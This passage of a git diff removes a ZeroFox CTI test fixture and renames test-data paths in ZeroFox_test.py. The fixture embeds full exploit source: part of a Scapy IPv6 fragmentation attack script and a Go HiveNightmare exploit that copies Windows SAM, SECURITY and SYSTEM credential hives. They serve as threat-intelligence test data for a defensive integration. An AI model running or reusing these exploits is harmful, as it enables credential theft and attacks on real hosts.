PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xa0)),\n ]) \\\n / IPv6ExtHdrFragment(\n id = second_pkt_id, m = 1,\n nh = 17, offset = 0\n ) \\\n / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)\n\n reassembled_pkt = bytes(reassembled_pkt)\n assert (len(reassembled_pkt) % 8) == 0, 'not aligned'\n frags = frag6(args.target, frag_id, reassembled_pkt, 60)\n\n print(f'{len(frags)} fragments, total size {hex(len(reassembled_pkt))}')\n sendp(frags, iface= args.iface)\n\n reassembled_pkt_2 = Ether() \\\n / IPv6(dst = args.target) \\\n / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \\\n / 'doar-e ftw'\n\n sendp(reassembled_pkt_2, iface = args.iface)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--target', default = 'ff02::1')\n parser.add_argument('--iface', default = 'eth1')\n args = parser.parse_args()\n pull_the_trigger(args)\n return\n\nif __name__ == '__main__':\n main()" - }, - { - "created_at": "2021-07-26T17:24:06Z", - "cve": "CVE-2021-36934", - "urls": [ - "https://github.com/FireFart/hivenightmare", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934" - ], - "exploit": "package main\n\nimport (\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"os\"\n\t\"time\"\n)\n\nconst (\n\tbase = `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy`\n\ttimeFormat = \"2006-01-02T15_04_05Z07_00\"\n)\n\nfunc processFile(path string) ([]byte, time.Time, error) {\n\tf, err := os.Open(path)\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error opening file: %+v\", err)\n\t}\n\tdefer f.Close()\n\tinfo, err := f.Stat()\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error getting file info: %+v\", err)\n\t}\n\tcontent, err := ioutil.ReadFile(path)\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error reading file content: %+v\", err)\n\t}\n\treturn content, info.ModTime(), nil\n}\n\nfunc checkFile(friendlyname, path string) ([]byte, time.Time, error) {\n\tvar lastmodify time.Time\n\tvar content []byte\n\tfor i := 1; i <= 20; i++ {\n\t\tfullPath := fmt.Sprintf(`%s%d\\%s`, base, i, path)\n\t\tfileContent, fileMod, err := processFile(fullPath)\n\t\tif err != nil {\n\t\t\t// fmt.Println(err)\n\t\t\tcontinue\n\t\t}\n\t\tif fileMod.After(lastmodify) {\n\t\t\tlastmodify = fileMod\n\t\t\tcontent = fileContent\n\t\t}\n\t}\n\tif content == nil || len(content) == 0 {\n\t\treturn nil, time.Now(), fmt.Errorf(\"could not detect a copy of %s in a shadow copy. Maybe the system is already patched or there are no shaow copies\", friendlyname)\n\t}\n\treturn content, lastmodify, nil\n}\n\nfunc main() {\n\tcontent, lastMod, err := checkFile(\"SAM\", `Windows\\System32\\config\\SAM`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_sam_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SAM to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n\n\tcontent, lastMod, err = checkFile(\"SECURITY\", `Windows\\System32\\config\\SECURITY`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_security_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SECURITY to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n\n\tcontent, lastMod, err = checkFile(\"SYSTEM\", `Windows\\System32\\config\\SYSTEM`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_system_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SYSTEM to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n}" - } - ] -} diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/create_entity.json b/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/create_entity.json deleted file mode 100644 index 48a690e4c128..000000000000 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/create_entity.json +++ /dev/null @@ -1,3 +0,0 @@ -{ - "id": 1 -} diff --git a/Packs/ZeroFox/Integrations/ZeroFox/ZeroFox_test.py b/Packs/ZeroFox/Integrations/ZeroFox/ZeroFox_test.py index 50d5f8ae1474..9c995bfdb86b 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/ZeroFox_test.py +++ b/Packs/ZeroFox/Integrations/ZeroFox/ZeroFox_test.py @@ -30,10 +30,11 @@ BASE_URL = "https://api.zerofox.com" OK_CODES = (200, 201) FETCH_LIMIT = 100 +DATE_FORMAT = "%Y-%m-%dT%H:%M:%S" def load_json(file: str): - with open(file, 'r') as f: + with open(file) as f: return json.load(f) @@ -47,6 +48,14 @@ def build_zf_client() -> ZFClient: ) +def get_delayed_formatted_date(str_date: str, delay=timedelta(seconds=1)): + formatted_date = parse_date(str_date, date_formats=(DATE_FORMAT,),) + if formatted_date is None: + raise ValueError("date must be a valid string date") + delayed_date = formatted_date + delay + return delayed_date.strftime(DATE_FORMAT) + + def test_fetch_incidents_first_time_with_no_data(requests_mock, mocker): """ Given @@ -59,16 +68,15 @@ def test_fetch_incidents_first_time_with_no_data(requests_mock, mocker): And return last_fetch equal to first_fetch_time And 0 incidents """ - alerts_response = load_json("TestData/alerts/list_no_records.json") + alerts_response = load_json("test_data/alerts/list_no_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() - last_run = {} + last_run: dict = {} first_fetch_time = "2023-06-01T00:00:00" - date_format = "%Y-%m-%dT%H:%M:%S" first_fetch_time_parsed = parse_date( first_fetch_time, - date_formats=(date_format,), + date_formats=(DATE_FORMAT,), ) spy = mocker.spy(client, "list_alerts") @@ -98,21 +106,20 @@ def test_fetch_incidents_first_time(requests_mock, mocker): And return last_fetch equal to last alert timestamp + 1 second And 10 incidents correctly formatted """ - alerts_response = load_json("TestData/alerts/list_10_records.json") + alerts_response = load_json("test_data/alerts/list_10_records.json") last_alert_timestamp = alerts_response["alerts"][-1]["timestamp"] requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() - last_run = {} + last_run: dict = {} first_fetch_time = "2023-06-01T00:00:00" - date_format = "%Y-%m-%dT%H:%M:%S" first_fetch_time_parsed = parse_date( first_fetch_time, - date_formats=(date_format,), + date_formats=(DATE_FORMAT,), + ) + last_alert_timestamp_formatted = get_delayed_formatted_date( + last_alert_timestamp, ) - last_alert_timestamp_formatted = (parse_date( - last_alert_timestamp, date_formats=(date_format,) - ) + timedelta(seconds=1)).strftime(date_format) spy = mocker.spy(client, "list_alerts") next_run, incidents = fetch_incidents( @@ -144,17 +151,16 @@ def test_fetch_incidents_no_first_time(requests_mock, mocker): And return last_fetch equal to last alert timestamp + 1 second And 10 incidents correctly formatted """ - alerts_response = load_json("TestData/alerts/list_10_records.json") + alerts_response = load_json("test_data/alerts/list_10_records.json") last_alert_timestamp = alerts_response["alerts"][-1]["timestamp"] requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() last_run = {"last_fetched": "2023-07-01T12:34:56"} first_fetch_time = "2023-06-01T00:00:00" - date_format = "%Y-%m-%dT%H:%M:%S" - last_alert_timestamp_formatted = (parse_date( - last_alert_timestamp, date_formats=(date_format,) - ) + timedelta(seconds=1)).strftime(date_format) + last_alert_timestamp_formatted = get_delayed_formatted_date( + last_alert_timestamp, + ) spy = mocker.spy(client, "list_alerts") next_run, incidents = fetch_incidents( @@ -167,7 +173,7 @@ def test_fetch_incidents_no_first_time(requests_mock, mocker): list_alert_params = spy.call_args[0][0] min_timestamp_called = list_alert_params.get( "min_timestamp" - ).strftime(date_format) + ).strftime(DATE_FORMAT) assert min_timestamp_called == last_run["last_fetched"] assert list_alert_params.get("sort_direction") == "asc" assert next_run["last_fetched"] == last_alert_timestamp_formatted @@ -187,7 +193,7 @@ def test_get_modified_remote_data_command_with_no_data(requests_mock, mocker): It should list alerts with the last_fetched set in last_run And return an empty list """ - alerts_response = load_json("TestData/alerts/list_no_records.json") + alerts_response = load_json("test_data/alerts/list_no_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() @@ -213,7 +219,7 @@ def test_get_modified_remote_data_command(requests_mock, mocker): It should list alerts with the last_fetched set in last_run And return a list with the ids of the modified alerts as strings """ - alerts_response = load_json("TestData/alerts/list_10_records.json") + alerts_response = load_json("test_data/alerts/list_10_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() @@ -243,7 +249,7 @@ def test_get_remote_data_command_with_opened_alert(requests_mock, mocker): And no entries in entries list """ alert_id = 123 - alert_response = load_json("TestData/alerts/opened_alert.json") + alert_response = load_json("test_data/alerts/opened_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) client = build_zf_client() @@ -270,7 +276,7 @@ def test_get_remote_data_command_with_closed_alert(requests_mock, mocker): And one entry in the entries list """ alert_id = "123" - alert_response = load_json("TestData/alerts/closed_alert.json") + alert_response = load_json("test_data/alerts/closed_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) client = build_zf_client() @@ -297,7 +303,7 @@ def test_get_alert_command(requests_mock, mocker): And with the correct output prefix """ alert_id = "123" - alert_response = load_json("TestData/alerts/closed_alert.json") + alert_response = load_json("test_data/alerts/closed_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) client = build_zf_client() @@ -328,7 +334,7 @@ def test_alert_user_assignment_command(requests_mock, mocker): """ alert_id = "123" username = "user123" - alert_response = load_json("TestData/alerts/closed_alert.json") + alert_response = load_json("test_data/alerts/closed_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/assign/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -363,7 +369,7 @@ def test_close_alert_command(requests_mock, mocker): And with the correct output prefix """ alert_id = "123" - alert_response = load_json("TestData/alerts/closed_alert.json") + alert_response = load_json("test_data/alerts/closed_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/close/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -397,7 +403,7 @@ def test_open_alert_command(requests_mock, mocker): And with the correct output prefix """ alert_id = "123" - alert_response = load_json("TestData/alerts/opened_alert.json") + alert_response = load_json("test_data/alerts/opened_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/open/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -431,7 +437,7 @@ def test_alert_request_takedown_command(requests_mock, mocker): And with the correct output prefix """ alert_id = "123" - alert_response = load_json("TestData/alerts/opened_alert.json") + alert_response = load_json("test_data/alerts/opened_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/request_takedown/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -465,7 +471,7 @@ def test_alert_cancel_takedown_command(requests_mock, mocker): And with the correct output prefix """ alert_id = "123" - alert_response = load_json("TestData/alerts/opened_alert.json") + alert_response = load_json("test_data/alerts/opened_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/cancel_takedown/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -505,8 +511,8 @@ def test_modify_alert_tags_command(requests_mock, mocker): action = "add" action_in_request = "added" tags_in_request = tags.split(",") - alert_response = load_json("TestData/alerts/opened_alert.json") - change_tags_response = load_json("TestData/alerts/change_tags.json") + alert_response = load_json("test_data/alerts/opened_alert.json") + change_tags_response = load_json("test_data/alerts/change_tags.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post("/1.0/alerttagchangeset/", json=change_tags_response) requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -556,7 +562,7 @@ def test_create_entity_command_with_true_flag(requests_mock, mocker): organization = "org" strict_name_matching_request = True tags_request = tags.split(",") - entity_response = load_json("TestData/entities/create_entity.json") + entity_response = load_json("test_data/entities/create_entity.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post("/1.0/entities/", json=entity_response) client = build_zf_client() @@ -615,7 +621,7 @@ def test_create_entity_command_with_false_flag(requests_mock, mocker): organization = "org" strict_name_matching_request = False tags_request = tags.split(",") - entity_response = load_json("TestData/entities/create_entity.json") + entity_response = load_json("test_data/entities/create_entity.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post("/1.0/entities/", json=entity_response) client = build_zf_client() @@ -658,12 +664,12 @@ def test_list_alerts_command_with_no_records(requests_mock, mocker): And return an empty list as output And with the correct output prefix """ - alerts_response = load_json("TestData/alerts/list_no_records.json") + alerts_response = load_json("test_data/alerts/list_no_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() spy = mocker.spy(client, "list_alerts") - args = {} + args: dict = {} results = list_alerts_command(client, args) @@ -683,12 +689,12 @@ def test_list_alerts_command_with_records(requests_mock, mocker): And return a list with alerts as output And with the correct output prefix """ - alerts_response = load_json("TestData/alerts/list_10_records.json") + alerts_response = load_json("test_data/alerts/list_10_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() spy = mocker.spy(client, "list_alerts") - args = {} + args: dict = {} results = list_alerts_command(client, args) @@ -708,12 +714,12 @@ def test_list_entities_command_with_no_records(requests_mock, mocker): And return an empty list as output And with the correct output prefix """ - entities_response = load_json("TestData/entities/entities_no_records.json") + entities_response = load_json("test_data/entities/entities_no_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/entities/", json=entities_response) client = build_zf_client() spy = mocker.spy(client, "list_entities") - args = {} + args: dict = {} results = list_entities_command(client, args) @@ -733,12 +739,12 @@ def test_list_entities_command_with_records(requests_mock, mocker): And return a list with entities as output And with the correct output prefix """ - entities_response = load_json("TestData/entities/entities_8_records.json") + entities_response = load_json("test_data/entities/entities_8_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/entities/", json=entities_response) client = build_zf_client() spy = mocker.spy(client, "list_entities") - args = {} + args: dict = {} results = list_entities_command(client, args) @@ -759,13 +765,13 @@ def test_get_entity_types_command_with_no_records(requests_mock, mocker): And with the correct output prefix """ entity_types_response = load_json( - "TestData/entities/entity_types_no_records.json", + "test_data/entities/entity_types_no_records.json", ) requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/entities/types/", json=entity_types_response) client = build_zf_client() spy = mocker.spy(client, "get_entity_types") - args = {} + args: dict = {} results = get_entity_types_command(client, args) @@ -786,13 +792,13 @@ def test_get_entity_types_command_with_records(requests_mock, mocker): And with the correct output prefix """ entity_types_response = load_json( - "TestData/entities/entity_types_10_records.json", + "test_data/entities/entity_types_10_records.json", ) requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/entities/types/", json=entity_types_response) client = build_zf_client() spy = mocker.spy(client, "get_entity_types") - args = {} + args: dict = {} results = get_entity_types_command(client, args) @@ -813,13 +819,13 @@ def test_get_policy_types_command_with_no_records(requests_mock, mocker): And with the correct output prefix """ policy_types_response = load_json( - "TestData/policies/policy_types_no_records.json", + "test_data/policies/policy_types_no_records.json", ) requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/policies/", json=policy_types_response) client = build_zf_client() spy = mocker.spy(client, "get_policy_types") - args = {} + args: dict = {} results = get_policy_types_command(client, args) @@ -840,13 +846,13 @@ def test_get_policy_types_command_with_records(requests_mock, mocker): And with the correct output prefix """ policy_types_response = load_json( - "TestData/policies/policy_types_13_records.json", + "test_data/policies/policy_types_13_records.json", ) requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/policies/", json=policy_types_response) client = build_zf_client() spy = mocker.spy(client, "get_policy_types") - args = {} + args: dict = {} results = get_policy_types_command(client, args) @@ -871,7 +877,7 @@ def test_modify_alert_notes_command(requests_mock, mocker): """ alert_id = "123" notes = "some notes" - alert_response = load_json("TestData/alerts/opened_alert.json") + alert_response = load_json("test_data/alerts/opened_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -914,7 +920,7 @@ def test_submit_threat_command(requests_mock, mocker): alert_type = "email" violation = "phishing" entity_id = "123" - submit_response = load_json("TestData/alerts/submit_threat.json") + submit_response = load_json("test_data/alerts/submit_threat.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post("/2.0/threat_submit/", json=submit_response) client = build_zf_client() @@ -955,8 +961,8 @@ def test_compromised_domain_command(requests_mock, mocker): And with the correct output prefix """ domain = "abc.xyz" - c2_domains_response = load_json("TestData/cti/c2-domains.json") - phishing_response = load_json("TestData/cti/phishing.json") + c2_domains_response = load_json("test_data/cti/c2-domains.json") + phishing_response = load_json("test_data/cti/phishing.json") requests_mock.post("/auth/token/verify/") requests_mock.post("/auth/token/", json={"access": "token"}) requests_mock.get("/cti/c2-domains/", json=c2_domains_response) @@ -992,12 +998,12 @@ def test_compromised_email_command(requests_mock, mocker): And with the correct output prefix """ email = "abc@test.xyz" - email_response = load_json("TestData/cti/email-addresses.json") + email_response = load_json("test_data/cti/email-addresses.json") credentials_response = load_json( - "TestData/cti/compromised-credentials.json", + "test_data/cti/compromised-credentials.json", ) botnet_credentials_response = load_json( - 